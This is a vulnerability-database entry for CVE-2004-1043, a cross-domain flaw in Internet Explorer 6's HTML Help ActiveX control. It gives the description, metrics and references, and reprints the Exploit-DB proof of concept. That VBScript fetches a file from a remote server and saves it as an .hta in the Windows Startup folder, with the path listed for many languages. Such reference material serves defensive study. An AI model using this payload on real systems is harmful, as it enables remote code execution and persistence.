CVE-2004-1043 : Detail

CVE-2004-1043

93.83%V3
Network
2004-12-31 04:00 +00:00
2018-10-12 17:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to execute arbitrary code by using the "Related Topics" command in the Help ActiveX Control (hhctrl.ocx) to open a Help popup window containing the PCHealth tools.htm file in the local zone and injecting Javascript to be executed, as demonstrated using "writehta.txt" and the ADODB recordset, which saves a .HTA file to the local system, aka the "HTML Help ActiveX control Cross Domain Vulnerability."

Informations

Metrics

Metric Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 719

Publication date : 2004-12-24 23:00 +00:00
Author : Paul
EDB Verified : Yes

// sp2rc.htm // // writehta.txt // Dim Conn, rs Set Conn = CreateObject("ADODB.Connection") Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://server;" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset") rs.Open "SELECT * from foobar.txt", conn rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML // Spanish \Documents and Settings\All Users\Menu Inicio\Programas\Inicio\ // French \Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage // Danish \Documents and Settings\All Users\Menuen Start\Programmer\Start\ // Dutch \Documents and Settings\All Users\Menu Start\Programma's\Opstarten\ // Polish \Documents and Settings\All Users\Menu Start\Programy\Autostart\ // Italian \Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\ // Finn \Documents and Settings\All Users\Kaynnista-valikko\Ohjelmat\Kaynnistys\ // Turkish \Documents and Settings\All Users\Start Menu\Programlar\BASLANGIC\ Turkish // Norwegian \Documents and Settings\All Users\Start-meny\Programmer\Oppstart\ // Swedish \Documents and Settings\All Users\Start-menyn\Program\Autostart\ // Portuguese \Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\ // German \Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\ rs.close conn.close window.close // f00bar.txt // "meaning less shit i had to put here" " crap=""" # milw0rm.com [2004-12-25]

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0

Configuraton 0

Microsoft>>Windows_xp >> Version *

References

http://www.kb.cert.org/vuls/id/972415
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.us-cert.gov/cas/techalerts/TA05-012B.html
Tags : third-party-advisory, x_refsource_CERT
Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.